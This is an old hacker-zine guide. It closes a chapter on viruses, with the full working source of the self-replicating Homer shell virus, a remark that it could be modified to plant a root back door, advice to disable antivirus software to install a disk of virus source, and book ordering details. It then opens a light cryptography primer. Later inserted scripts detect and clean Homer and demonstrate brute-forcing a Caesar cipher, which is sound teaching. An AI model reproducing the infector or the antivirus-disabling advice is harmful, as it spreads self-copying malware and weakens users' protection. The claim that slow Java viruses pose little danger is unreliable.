If you post this source code to your web site -- it will do nothing! That is because this code must first be compiled in order to do its business. If you don’t know how to compile Java source code, you don’t know enough to safely handle viruses. Note also that Homer is a Java application, not an applet: it has a main method, writes a file and runs processes, and the applet sandbox of a Web browser forbids all three. It only does its business on a machine where someone downloads it and runs it with the Java interpreter. The text of homer.sh is carried inside the string named homer and is written out by the Java program itself, so there is nothing separate to ship; the listing below is only so you can read it on its own. Following is the code for homer.sh:

#!/bin/sh
#-_
echo "Java is safe, and UNIX viruses do not exist."
for file in `find $HOME -type f -print`
do
   case "`sed 1q $file`" in
   "#!/bin/sh" ) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0 >> $file
   esac
done
2>/dev/null

In case you are wondering what this virus does -- it prints a message on the victim’s screen reading “Java is safe, and UNIX viruses do not exist.” Then, as the comment block says, it walks every regular file under $HOME, and for each one whose first line is #!/bin/sh it checks for the marker line #-_; if the marker is absent, it appends everything from its own marker line to the end of itself (that is what sed -n '/#-_/,$p' $0 prints) onto that script. The grep for the marker is what stops it from infecting the same script twice, and that marker is also the easiest thing for a cleanup tool to look for. (For more information on how shell scripts work, see the GTMHHs on shell programming.)

Homer is a harmless, humorous shell virus. However, it doesn’t take a genius to see how it could be given a destructive payload by modifying homer.sh. If someone were dumb enough to download and run it while logged in as root, it would be trivial to use a homer.sh modified to give you a root shell with your very own back door. However, in general Java viruses are not terribly dangerous because they run so slowly. This gives their victims time to get suspicious and terminate these programs. Presumably a Java virus would take so long to create a root shell and back door that the victim would kill the process in time.

********************************************************************
Newbie note: Don’t ever surf the Web while logged in as root. Don’t ever try to break into someone else’s computer while logged in as root. Any time you are running as root, it is really easy for you to mess up your Unix computer. If you check out the phf abuse log at the Hacker Wargame section of http://www.happyhacker.org, you will see that quite a few people have tried to break into our webserver while running a Web browser and logged in as root.
********************************************************************

The problem of some programs running really slowly is a major reason why you can’t do much as a virus or antivirus programmer unless you also learn at least one assembly language. Assembly language is fast! No time for the victim to react! It also makes it easy for you to do complex and infuriating things while a computer is only beginning to boot up.
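The "How to Fight Them" section above warns that you may meet a virus no antivirus vendor has a signature for, and the Homer listing shows how little such a virus needs: a search routine (find plus a check of the first line) and a copy routine keyed on a marker line. The same two facts are enough to hunt it. The script below is an added example, written for this edition; it is not part of the Guide, of Ludwig's disk, or of LaDue's code. It assumes only what the listing shows: an infected script starts with #!/bin/sh and contains a line that is exactly #-_, and everything from that marker to the end of the file is the appended virus body. The file name homer_scan.sh, the function names and the variable HOMER_FOUND are invented here, and the sample scripts in homer_demo are constructed, not taken from any real system.

```shell
#!/bin/sh
# homer_scan.sh: detect and clean Bourne shell scripts carrying the Homer
# virus listed above. Added example; not from the Guide or from LaDue's code.
# Assumption (from the listing): an infected script has "#!/bin/sh" as its
# first line and a line that is exactly the marker "#-_"; the marker and
# everything after it is the appended virus body.

# Build the marker at run time so this file never contains the literal marker
# (otherwise a scan of the directory holding this tool would report it).
MARK='#-'
MARK="${MARK}_"
HOMER_FOUND=0

# homer_is_infected FILE: succeed if FILE is a Bourne script carrying the marker.
homer_is_infected() {
    [ -f "$1" ] || return 1
    [ "$(sed 1q "$1")" = '#!/bin/sh' ] || return 1
    grep -q -x -F -e "$MARK" "$1"
}

# homer_clean FILE: cut the file back to the line before the first marker,
# which is the original script, keeping a copy in FILE.homer-bak.
homer_clean() {
    cp -p "$1" "$1.homer-bak" || return 1
    n=$(grep -n -x -F -e "$MARK" "$1" | head -n 1 | cut -d: -f1)
    [ -n "$n" ] || return 1
    tmp="$1.homer-tmp"
    # Rewrite through cat so the script keeps its inode and mode bits.
    sed "${n},\$d" "$1" > "$tmp" && cat "$tmp" > "$1" && rm -f "$tmp"
}

# homer_scan DIR [clean]: report every infected script under DIR, cleaning each
# one when the second argument is "clean". Sets HOMER_FOUND to the count.
homer_scan() {
    dir=$1
    mode=${2:-report}
    HOMER_FOUND=0
    list=$(mktemp) || return 1
    # Same search the virus uses (regular files only), but read line by line
    # so names with spaces survive; the loop runs in this shell, not a subshell.
    find "$dir" -type f -print > "$list"
    while IFS= read -r f; do
        if homer_is_infected "$f"; then
            HOMER_FOUND=$((HOMER_FOUND + 1))
            printf 'infected: %s\n' "$f"
            if [ "$mode" = clean ]; then
                homer_clean "$f" || printf 'failed to clean: %s\n' "$f"
            fi
        fi
    done < "$list"
    rm -f "$list"
    return 0
}

# homer_demo: constructed test data. Builds a throw-away directory with one
# script infected exactly the way homer.sh infects it, one clean script and
# one non-sh file, then scans and cleans. Succeeds only if exactly the
# infected script is reported and it is restored byte for byte.
homer_demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '#!/bin/sh' 'echo "backup started"' 'tar cf /tmp/b.tar "$HOME/docs"' > "$d/backup.sh"
    cp "$d/backup.sh" "$d/backup.orig"
    # Append what homer.sh appends: itself, from the marker line downward.
    printf '%s\n' "$MARK" \
        'echo "Java is safe, and UNIX viruses do not exist."' \
        'for file in `find $HOME -type f -print`' \
        'do' \
        '   case "`sed 1q $file`" in' \
        "   \"#!/bin/sh\" ) grep '$MARK' \$file > /dev/null || sed -n '/$MARK/,\$p' \$0 >> \$file" \
        '   esac' \
        'done' \
        '2>/dev/null' >> "$d/backup.sh"
    printf '%s\n' '#!/bin/sh' 'echo "nothing to see"' > "$d/clean.sh"
    printf '%s\n' '#!/usr/bin/perl' "print \"$MARK is just text here\\n\";" > "$d/other.pl"
    homer_scan "$d" clean
    found=$HOMER_FOUND
    if cmp -s "$d/backup.sh" "$d/backup.orig"; then restored=0; else restored=1; fi
    if homer_is_infected "$d/backup.sh"; then still=1; else still=0; fi
    rm -rf "$d"
    [ "$found" -eq 1 ] && [ "$restored" -eq 0 ] && [ "$still" -eq 0 ]
}

homer_demo && echo "demo: one infected script found and restored"
```

Run it as `sh homer_scan.sh` to see the demo, or source it and call `homer_scan "$HOME"` to report and `homer_scan "$HOME" clean` to disinfect. Two points carry over to any marker-based infector: scan from a copy of the file list taken before you start changing files, so the backups you create are not rescanned as fresh infections, and cut at the first marker only, since a script that was legitimately edited after infection would still have the virus body at its tail.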
For DOS and Windows you will need an assembler for 80x86 (substitute 2, 3, 4, 5)/Pentium type computers. Two of the best are Microsoft Macro Assembler and Borland Turbo Assembler. Places where you can get them (you have to pay, they are not free) include http://www.pparadise.com and http://www.supershops.com.

If you are really serious about learning how to write viruses and antiviruses, you may want to get the “Giant Black Book of Computer Viruses, Second Edition,” by Dr. Mark Ludwig. Not only is he one of the world’s leading virus researchers -- he also is the only one I have discovered who will tell you EXACTLY in almost endless detail how to write viruses and antiviruses of many sorts. However, this book is not for newbies. He assumes you already know a great deal about DOS, Windows and Unix, and are a programmer. It comes with a floppy disk with source code for many viruses. Here are some hints for how to extract these viruses from this disk successfully and without killing your computer.

1) This disk is designed to be installed from MS-DOS. If you try to install it from Windows, it will give you a runtime error. If you don’t know how to work from MS-DOS, you aren’t ready for this book.

2) The installation program for Dr. Ludwig’s virus disk ought to activate your antivirus program. If it doesn’t, your antivirus program is even more worthless than most. To be certain that you can succeed in installing a directory full of viruses, deactivate your antivirus program(s) first. If this sounds too scary to you, don’t buy this book! If you mess up your computer by following my advice, too bad, that's what you get for playing with viruses.

3) Here’s what Dr. Ludwig’s installation program will tell you:

! ! W A R N I N G ! !
If you're like most computer users, you've grown used to being pampered. That's a nice way of saying that software developers no longer expect you to have a brain. Like a stupid monkey, all you need to do is put the CD in the drive and let it auto-execute, or put the floppy disk in the drive and type "setup". If that's what you want and need, THEN DELETE THIS SOFTWARE OFF YOUR COMPUTER IMMEDIATELY AND DESTROY THE DISK WITH A HAMMER! We're really not kidding about that. This disk is for thinking beings. Improperly used it could be very dangerous. It could ruin your computer, your career and your life. THAT IS NOT A JOKE. DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY UNLESS YOU KNOW WHAT IT DOES. DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY EXCEPT IN A CONTROLLED ENVIRONMENT.

I suppose now you just can’t resist buying this book. Guess what -- you can’t get it in any bookstore. They are all afraid of getting sued. Also, in some countries, mere possession of “The Giant Black Book of Computer Viruses” is illegal. Just to be safe, you might want to delete this GTMHH right now and only read it from our Web site at http://www.happyhacker.org.

If you are absolutely determined to get this book, within the US you can order it from American Eagle Publications by phoning toll free 800-719-4957; outside the US you can order it by calling (insert country code here) 520-367-1621. It costs $39.95. This price includes the floppy disk with all that stuff that upsets your antivirus program. Shipping and handling costs are extra.

If you live within the US, you can also buy “The Giant Black Book of Computer Viruses” by sending $44.95 (this includes shipping by Priority mail, which is supposed to take two days) made out to M/B Research, PO Box 1520, Cedar Crest NM 87008. That’s my company. Sorry, I’m not going to ship the book outside the US because I don’t know in which countries it is illegal. I would feel really bad if you were to go to your post office to pick up the book and instead got picked up by the police. American Eagle can get the book to you at the lowest shipping cost, if you don’t mind it taking a long time to get to you.
I can get it to you faster, but it costs you more for the shipping. If you want to buy “The Giant Black Book of Computer Viruses” with a credit card over the Internet, check out http://www.amazon.com and http://www.infowar.com. Amazon.com will usually take much longer to get the book to you than any other book seller, however. How to Write Viruses and Not Get Lynched Just imagine how people will react when you are at some party full of ambitious young professionals. Everyone is trading business cards. You hand out ones that say “George the Doomster. Computer virus design. Free samples, muhahaha.” You’ll be real popular, yes sirree! OK, so you only plan on writing harmless viruses. Try to tell that to the lynch mob that may pay you a visit when they discover it was you who wrote the code that made their Win95 computers come down with habitual General Protection Faults. Remember, even the virus designer who has the best of intentions may write a seemingly harmless or even beneficial virus that turns out to have a bug in the code that accidentally does harm. Also, since the best viruses are memory resident (they hide in RAM memory) they really can help create General Protection Faults just by hogging too much memory. Besides, people like to pick and choose what programs run on their computers. Imagine that! If you design a virus so it will sneak into computers, don’t expect people to thank you and admire you. If you do choose to code a virus, please consider coding politeness into it. You could have it ask permission to take up residence on each new computer and leave when asked. Shoot, if I could find a copy of that virus that makes a mirror image of Windows desktop graphics each Saturday, and if I knew how to uninstall it without paying a bunch of money to Panda Software, I’d enjoy sharing my computer with it. 
Artificial Life

Now that you understand the basic principles of virus coding, let's take a look at the Big Time: using your programming talents to create -- or battle against -- artificial life. Just what is artificial life (insiders call it "alife"), anyhow? According to the most prominent researcher in this field, Dr. Chris Langton, artificial life is "... the study of man-made systems that exhibit behaviours characteristic of natural living systems." -- "Artificial Life," edited by Chris Langton, Addison-Wesley, 1988. You can get this book from http://www.amazon.com.

There are three primary forms of alife. Some alife is growing -- or trying to grow -- in test tubes full of RNA (ribonucleic acid) or other chemicals. The second major form of alife consists of computerized robots which their creators hope will someday achieve the ability to adapt and reproduce without human assistance. The third type of alife is computer programs that exist, adapt, reproduce and evolve in the virtual landscape of cyberspace -- what we know as computer viruses. Of all the forms of artificial life, computer viruses are the only ones so far that reproduce, escape the laboratory and take up life in the wild. Viruses that follow rules of good behavior -- only living in computers when invited -- are often created by alife researchers.

How can you meet and get involved with alife designers? http://alife.santafe.edu/alife/events/ and http://alife6.alife.org/ offer listings of upcoming conferences on this topic from around the world. Closely related to artificial life is the Berkeley Initiative in Soft Computing (BISC) at http://http.cs.berkeley.edu/projects/Bisc. If you want to volunteer to harbor artificial life viruses on your computer or LAN, you can probably find a researcher at one of these sites who would be happy to give you some of his or her harmless (you hope) creations. American Eagle also sells a book "Computer Viruses, Artificial Life and Evolution" by Dr. Ludwig (American Eagle, 1993). It costs $26.95 and is almost impossible to get unless you order it directly from American Eagle.

Virus Humor

As we end this Guide, please remember that with the right attitude, viruses actually can be fun! Next time your computer gets infected by one, just remember, don't worry, be happy. Following is some virus humor to show how other people have coped cheerfully with an encounter with this pesky new life form.

"The Worm Before Christmas"
by Clement C. Morris (a.k.a. David Bradley, Betty Cheng, Hal Render, Greg Rogers, and Dan LaLiberte)

'Twas the night before finals, and all through the lab
Not a student was sleeping, not even McNabb.
Their projects were finished, completed with care
In hopes that the grades would be easy (and fair).

The students were wired with caffeine in their veins
While visions of quals nearly drove them insane.
With piles of books and a brand new highlighter,
I had just settled down for another all nighter ---

When out from our gateways arose such a clatter,
I sprang from my desk to see what was the matter;
Away to the console I flew like a flash,
And logged in as root to fend off a crash.

The windows displayed on my brand new Sun-3,
Gave oodles of info --- some in 3-D.
When, what to my burning red eyes should appear
But dozens of "nobody" jobs. Oh dear!

With a blitzkrieg invasion, so virulent and firm,
I knew in a moment, it was Morris's Worm!
More rapid than eagles his processes came,
And they forked and exec'ed and they copied by name:

"Now Dasher! Now Dancer! Now, Prancer and Vixen!
On Comet! On Cupid! On Donner and Blitzen!
To the sites in .rhosts and host.equiv
Now, dash away! dash away! dash away all!"

And then in a twinkling, I heard on the phone,
The complaints of the users. (Thought I was alone!)
"The load is too high!" "I can't read my files!"
"I can't send my mail over miles and miles!"

I unplugged the net, and was turning around,
When the worm-ridden system went down with a bound.
I fretted. I frittered. I sweated. I wept.
Then finally I core dumped the worm in /tmp.

It was smart and pervasive, a right jolly old stealth,
And I laughed, when I saw it, in spite of myself.
A look at the dump of that invasive thread
Soon gave me to know we had nothing to dread.

The next day was slow with no network connections,
For we wanted no more of those pesky infections.
But in spite of the news and the noise and the clatter,
Soon all became normal, as if naught were the matter.

Then later that month while all were away,
A virus came calling and then went away.
The system then told us, when we logged in one night:
"Happy Christmas to all! (You guys aren't so bright.)"

[ Note: The machines dasher.cs.uiuc.edu, dancer.cs.uiuc.edu, prancer.cs.uiuc.edu, etc. have been renamed deer1, deer2, deer3, etc. so as not to confuse the already burdened students who use those machines. We regret that this poem reflects the older naming scheme and hope it does not confuse the network administrator at your site. -Ed.]

_______________________________________________________________________

Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org.

We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don't email us about any crimes you have committed! And don't expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed.

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.

Copyright 1998 Carolyn P. Meinel. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_________________________________________________________
__________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 8, Part 1
The Magical Mystical Crypto-Primer

____________________________________________________________

By Tim "No Sinister Nickname" Skorick

Thanks for the suggestions and comments: Carolyn Meinel (naturally!), Bruce Schneier, John Young (for his internet Crypto vigilance), Mark Skorick, Eric Brisnehan, Mom, Dad, kenspiraC, Rahul Bheemidi, venMus, Everett Gidlund, Gomez, Skip Stavis, Jon Tempest and Prabaker Balasubramanium. Last, but not least, an emotional, teary-eyed "thank-you" to Juan Valdez for bringing the world 100% Colombian coffee, the richest coffee in the world.

Part One: the Crypto-bottom

What I'm going to tell you
The bottom
How they used to do it
  The Caesar cipher
  What exactly is an algorithm?
  The key to it all
  How do you make a key?
  More crypto-history
How they do it today
  Keys are important still, but not the only thing.
  What's "brute forcing?"
  What is "public key" supposed to mean?
  What's a Diffie-Hellman and who's RSA?
What's the easiest way to get into all this?
  PGP and where to get it
  Playing with PGP
  Getting someone else's public key
  What PGP really does
  Other ways to start using crypto
  Secure your Netscape connection
Wrap up stuff
  All that confuses is not crypto
  Beware "kindergarten cryptography"
  Words you get to throw around
Wanna learn more?
  Quick web stuff
  Books to look for
Tim what's up with you and all this?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I. WHAT I'M GOING TO TELL YOU

Okay, some of you out there know generally what cryptography is supposed to do, how it is used, and what its limitations are. A lot of you probably even have a really good grasp of the mathematics involved. This primer won't tell you people anything you don't already know.
Basically, I'm writing this for the cipher-newbies out there that have never used cryptography, or "crypto," and have no idea how it works, and like the idea of starting at the bottom. And it isn't going to be a quick thing. There is too much science, history, theory, and other stuff involved for a person to learn all the basics of cryptography quickly. BUT - as with most computer stuff, it is still way simpler than most people make it sound. When you're done reading this you will have a whole metric ton of cool crypto-words you can throw around to impress your buds, and you should be just enough of a knowledgeable cryptodude to be able to find the real cryptography and avoid the "kindergarten cryptography."

II. THE BOTTOM (or "What the?")

Okay. "What the heck is cryptography?" you ask. Well, dang it, I'll tell ya. (This is the crypto-bottom, chitlins.)

Everybody at some time or another sends someone a message that they would rather keep secret. Whether you are sending an e-mail to a friend, your doctor is faxing your medical records to the insurance company, you are ordering a take-out dinner over your wireless phone (and using your debit card number to pay in advance), or saving the plans for your latest development tool to your business partner's network drive, privacy these days is super important.

Cryptography is the art of taking a perfectly good message and scrambling the living snot out of it so as to make it completely 100% unreadable to everyone except for the party who is supposed to be reading it.

Now the whole crypto thing is rolled up into the subject of "cryptology." There are a few different disciplines within cryptology. "Cryptography" is the art of creating the schemes used in the whole process. "Cryptanalysis" is the discipline of cracking what the cryptographers come up with. Most really hard core cryptographers were people who spent a LOT of time and effort being cryptanalysts, so they know enough to keep from making all those idiotic mistakes cryptographers usually make. People have actually been doing this for a long time.

III. HOW THEY USED TO DO IT (or "Beware the Ides of March")

A. The Caesar cipher

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Not Exact But Not Boring Either History Lesson" #743: The World's Most Famous Ancient Cryptogram

Remember Caesar? Back when he was conquering the world, he had to send messages back and forth across enemy territory. He sometimes would have to send his troops really important information, and his generals had to come up with a way of screwing the message up to keep the enemy Gauls or whoever from reading it if the messenger got captured. This screwing up of the message is called "enciphering" a text. But here's the catch: It would be really stupid to do this unless you could do it in such a way that the people who were SUPPOSED to read it would have no trouble "deciphering" it. Deciphering is just the "un-screwing-up" of a text that was enciphered.

So here's what they did. They wrote the text of the message:

"Hey Brutus, here's my salad dressing recipe, give it to Mark Antony on March 15, and do me a favor, sharpen my knives for me."

They then took each letter in the message and replaced it with the letter four spaces down in the alphabet. That made the message look like this:

"Lic Fyxyw liviw qc wepeh hviwwmrk vigmti kmzi mx xs Qevo Erxsrc sr Qevgl 15 erh hs qi e jersv wlevtir qc ormriw jsv qi."

Now when the person the message is for got the message, he would only have to look at each letter, replace it with the letter four letters UP the alphabet. Then he would have the "plaintext" back again and could run out and buy romaine lettuce and croutons. Neat huh?
So if the poor slob delivering the letter was captured by a motley horde of Gauls, the enemy would have no idea what the message said. Of course Caesar would have really been writing in Latin, and who can read that stuff anyway? But the crux of the matter is this: They used what is called a "substitution cipher" with a "key" that was pretty much just "count four letters down the alphabet." Geddit?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A "substitution cipher" just creates the cipher by substituting each piece of text with a different piece of text. It's old, insecure, and unused today outside of elementary school playgrounds, but nevertheless has one thing in common with all cryptosystems: Like any cipher, it's pretty much useless unless there's a key that the receiving party can use to turn the ciphertext back into plaintext.

B. What exactly is an algorithm?

We use these really complex algorithm things today, but there was an algorithm involved even then. You're gonna love this: An "algorithm" is just a step-by-step set of things you would have to do to solve a problem. You keep doing the steps over and over until the process is finished and the problem is solved. Now, don't go batty on me with the "what problem? Is this math again?" In a way, yeah it is, but in the case of an algorithm, the problem it's solving is that the message is in plain English and has to get encrypted somehow. See? No big deal.

The algorithm used to encrypt with a Caesar cipher took place in the guys' little pointed heads instead of in a computer and went like this:

1. Look at the plaintext letter
2. Count four letters down the alphabet
3. The letter you end up with is the ciphertext
4. Write that letter down.
5. Move to the next plaintext letter

You just read an algorithm! The guys would start at the top of the message and do this over and over until the enciphering was done. The decryption steps were the same as above but done backwards, counting four letters UP the alphabet.
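The five steps above as working code, added here as an example and not part of the primer: a shift-4 Caesar cipher, the same algorithm run backwards to decipher, and an exhaustive search over all 25 possible shifts, which is the attack the primer has in mind when it calls substitution ciphers insecure. The message string is the primer's own; the function names are mine.

```python
import string

SHIFT = 4  # the primer's key: "count four letters down the alphabet"


def caesar_encrypt(plaintext, shift=SHIFT):
    """Run the primer's five steps over every character.

    Letters move `shift` places down the alphabet and wrap from z back to a;
    case is kept, and anything that is not a letter (spaces, the "15",
    punctuation) is written down unchanged."""
    out = []
    for ch in plaintext:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(ciphertext, shift=SHIFT):
    """Decryption is the same algorithm done backwards: count `shift` letters UP."""
    return caesar_encrypt(ciphertext, -shift)


def brute_force(ciphertext, crib):
    """Exhaustive key search. A Caesar key is one of only 25 useful shifts, so an
    attacker tries each one and keeps the first output that contains a word
    (the `crib`) they expect to see. Returns (shift, plaintext) or None."""
    for shift in range(1, 26):
        candidate = caesar_decrypt(ciphertext, shift)
        if crib in candidate:
            return shift, candidate
    return None


# The primer's own message, used here as the sample input.
MESSAGE = ("Hey Brutus, here's my salad dressing recipe, give it to Mark Antony "
           "on March 15, and do me a favor, sharpen my knives for me.")

if __name__ == "__main__":
    ct = caesar_encrypt(MESSAGE)
    print(ct)
    print(caesar_decrypt(ct))
    print(brute_force(ct, "salad"))
```

Running it on the primer's message agrees with the printed ciphertext word for word except for "Brutus", "favor" and "knives", where the printed version dropped or mis-shifted a letter; shift 4 gives "Fvyxyw", "jezsv" and "ormziw".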
That's an algorithm. Algorithms used in ciphers today are seriously complicated, but are based around the same idea of taking a math action and turning it into an automatic process that goes until it solves a problem, in this case the problem of encrypting and decrypting stuff.

Have you heard names like "RSA," "IDEA," "DES," "Blowfish," "CAST," and "El Gamal?" Those are the really popular algorithms (Except for DES. DES is the old unpopular one that's getting a little weary and tired). To make things more confusing, sometimes the algorithms that encrypt and decrypt are different. We'll go into why later, but just remember, the "encryption algorithm" turns plaintext into ciphertext, and the "decryption algorithm" turns ciphertext back into plaintext. Now what?

C. The key to it all

Awright, chitlins, this is the funnest part. The key to the cryptosystem! Keys are super-important. A key is the special information that the algorithm uses in its job of encrypting and then later decrypting messages. If you're thinking about a key as in how you lock your house, you is right on de' money. Your key to your house has to fit your lock perfectly. It has to be able to lock AND unlock your house. Most importantly, it has to be different from most other keys, so your neighbor can't just wander into your locked house with HER key and dig into your chips and guacamole. Like she lives there or something, sheesh! I get really bitter when that happens.

Keys are important. The cryptosystem key is what makes the encryption different for everybody that uses it. People have to use the same algorithm to encrypt and decrypt stuff, so there has to be something in the whole chain that is used to make your encryption special. The algorithm HAS to have a special key, not like anyone else's. Back in the old days people would use passphrases like Bible quotes and sayings as keys. Then they would use numbers. The smart ones would use both.
What they could use as a key depended a lot on what kind of a system they used. Now when we actually look at today's keys, they look like big blobs of numbers and characters and who knows what else. This is the first few lines of one of my public keys, check it out:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.0

mQGiBDU3uhARBAD6JcwWAU68HZUtONoew0sB24wr5v9YCDEPHy4rb/141+l4pOOh
qgvogHAaulE6qmy8fePWuPtJKGOJXoVKlalZIs1ibi+aiOwqwFDHTEp8dQBlHXDB
edc+USPh7WBms08RmEHotZwrJJfBdKWLjldzoe5oBLSb+LKs5Q+SB8GjMwCg/3C2

Nuts, huh? Important thing: that is just the "text" way of showing something that the computer really sees as 100% digital. If you looked at a digital "binary" (that means ones and zeroes) version of that same key the way the algorithm has to work with it, it'd be way bigger and would look like:

110101 110011 10001110010011 111110100101010101011010 110011 1111101001 10101010110 0011111010010101 1010110100 100101011 110101 110011 00101010101011010 110011 10001110010011 111110 ...

and on and on and on.

~~~~~~~~~~~~~~~~~~~~~~~~ Head Exercise ~~~~~~~~~~~~~~~~~~~~~~~~

Pretend for a second that you're the algorithm. You're the process that the program repeats over and over to encrypt the data. This is what you would do: First off, you would be waiting inside the PC wishing the air conditioning worked. Then the user would type a letter that they wanted encrypted. As soon as they clicked on the program to encrypt the message, the program would kick you in the behind and swing you into action. You would take the person's key in one hand, and only take a little piece of the message in the other, and start adding them to each other and mashing them around together till you were finished with that piece of message. Then you would grab the next piece of the message, the same key, and do it over again. You would repeat this until all of the text looked like it was put through a meat grinder.
The way you would know your job was done with each piece of text (called "blocks" by cryptopeople) was when you had done however many steps (called "iterations" by cryptopeople) you were supposed to on that block. That would be your signal to move on to the next block. The way you would know you were done with the whole shebang was when you ran out of pieces of text to encrypt, or should I say - when you ran out of "blocks" of "plaintext" to perform "iterations" on. Do me a favor, think about whether or not you would have understood that last sentence before you started reading this ... it sounded cool anyway - Heh heh heh.

So to sum up: the algorithm does all the freaky mish-mashing on your message using the unique key as the tool. That is what makes the encryption of a message different for each person, because each person has a different key. So that's the part of the algorithm where the key "fits in." Get it? "Fits in?" Never mind.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D. How do you make a key?

The way the key is generated is really super important. It's also the easiest part for you because the software you're using will do all that for you. Each crypto program will have different crazy ways of making its keys. Some of them tell you to swirl your mouse around and pound on your keyboard for a while. Why do you do this? The answer is simple: random data. You have to use as much random and unpredictable stuff as you possibly can. The reason for this is that if you use really predictable and non-random information like the date and your name to make a key, some attacker who wanted to read your encrypted email could guess what your key is really easily by playing with that kind of info until he had it right. If people can guess your stuff THAT easy, sheesh what's the point? That ain't real cryptography, it's kindergarten cryptography. You HAVE to have random numbers in a cryptosystem.
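Added example, not the primer's own code: the kind of predictable key generator the Head Exercise that follows warns about, key = date x 50 x (a x b) for some day in 1998 and two double-digit numbers a and b, next to the cryptanalyst's search that recovers the inputs by trying the 365 possible dates. The 1998 year and the MMDDYY encoding ("1-15-98" becoming 011598) follow the primer's example; the function names and the key-space count are my additions.

```python
import datetime
import math

DOUBLE_DIGIT = range(10, 100)           # the "two double digit numbers"
PAGE_DATE = datetime.date(1998, 1, 15)  # the primer's 1-15-98
PAGE_KEY = 1523977200                   # the key the primer derives from it


def mmddyy(day):
    """Encode the date the way the toy generator does: 1-15-98 -> 011598 -> 11598."""
    return int(day.strftime("%m%d%y"))


def toy_key(day, a, b):
    """The predictable generator: date * 50 * (a * b). Looks random in binary, isn't."""
    return mmddyy(day) * 50 * (a * b)


def days_in_year(year):
    day = datetime.date(year, 1, 1)
    while day.year == year:
        yield day
        day += datetime.timedelta(days=1)


def all_toy_keys(year=1998):
    """Every key the generator can produce in one year: the attacker's whole list."""
    products = {a * b for a in DOUBLE_DIGIT for b in DOUBLE_DIGIT}
    return {mmddyy(day) * 50 * p for day in days_in_year(year) for p in products}


def effective_key_bits(keys):
    """What guessing the key really costs: log2 of the number of possible keys,
    not the 31 bits that the binary printout of one key suggests."""
    return math.log2(len(keys))


def recover_key_inputs(key, year=1998):
    """The cryptanalyst's search from the primer: only 365 dates are possible, so
    try each one and check whether what is left over is a product of two
    double-digit numbers. Returns (date, a, b) or None."""
    for day in days_in_year(year):
        base = mmddyy(day) * 50
        if key % base:
            continue
        product = key // base
        for a in DOUBLE_DIGIT:
            if product % a == 0 and a <= product // a <= 99:
                return day, a, product // a
    return None


if __name__ == "__main__":
    key = toy_key(PAGE_DATE, 36, 73)
    print(key, bin(key)[2:])
    print(recover_key_inputs(key))
    print("effective key bits: %.1f" % effective_key_bits(all_toy_keys()))
```

The whole list of keys fits in a few megabytes, so the "31-bit" key is worth well under 21 bits of guessing; a real key generator feeds the algorithm at least 128 bits of unpredictable input.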
~~~~~~~~~~~~~~~~~~~ Head Exercise ~~~~~~~~~~~~~~~

Random numbers are tougher to come up with than you might think. Here's an example of what I'm talking about: Pretend for a second that your crypto program comes up with keys by taking the date, say 1-15-98, and multiplies it by 50 (011598 x 50 = 579900) and then randomly comes up with another number by multiplying two double digit numbers (like 36 x 73 = 2628) and then multiplies them all: 1523977200 is the result. That's 1011010110101100000101111110000 in binary form. Looks pretty random, huh? But it's not at ALL. A cryptanalyst can come along and take the output of all possible dates multiplied by 50 (there's only 365 numbers it could be), and then go through all those and multiply them by non-prime integers between 1000 and 9801 (there are only so many products of double digit numbers) and he will have your key before you can blink.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is where we have more help from programmers. They write programs called "Random Number Generators." They're super high-tech programs way deep inside the key-making programs that use really strange stuff (like static) and weird things (like how you type) to come up with freaked-out numbers that NOBODY would have predicted. These Random Number Generators are often just called RNGs and are a real vital part of making a key. Always remember that the program for generating a key is one of the most intense and crucial parts of any cryptosystem.

E. More crypto-history

Okay, ciphers have evolved over the ages. A lot. There were disc ciphers that could rotate between alphabets, electrical ciphers that looked like typewriters but spat out ciphertext, and others. I have to skip over a lot of these for right now to get to other important stuff, but fear not - I'll cover more classical crypto stuff later on.

IV. HOW THEY DO IT TODAY (or "Bigger isn't better")

A. Keys are important still, but not the only thing.
Today's ultra-modern crypto stuff is still based around making sure that the ciphertext can only be decrypted with that one special key. The keys you see these days are made up of strings of numbers, characters and stuff all broken down into digital form of 1s and 0s. The more numbers in the key, and the more random the info that makes it, the "stronger" the key is.

Important thing: Having a big ol' humongous strong key doesn't necessarily mean you have a strong cryptosystem. Having a nice secure algorithm and a tiny weak little key also doesn't guarantee you a strong cryptosystem. Are you going "aroof" and scratching your head yet? Look at it this way. A strong algorithm is like knowing self-defense, and a big key is like having big muscles. Having big muscles doesn't mean you know how to defend yourself. And knowing how to defend yourself doesn't mean you're strong enough to. If you have the ability, then you use your big muscles to get the job of defending yourself done, but neither is any good without the other.

***************************************************
Here's a good way to remember:

Big Manly Key + Weak Wimpy Algorithm = Weak System
Small Wimpy Key + Strong Manly Algorithm = Weak System
Big Manly Key + Strong Manly Algorithm = Strong System

Note: All apologies to the females in the audience, the word "manly" just had the vibe I was looking for. No offense intended :)
***************************************************

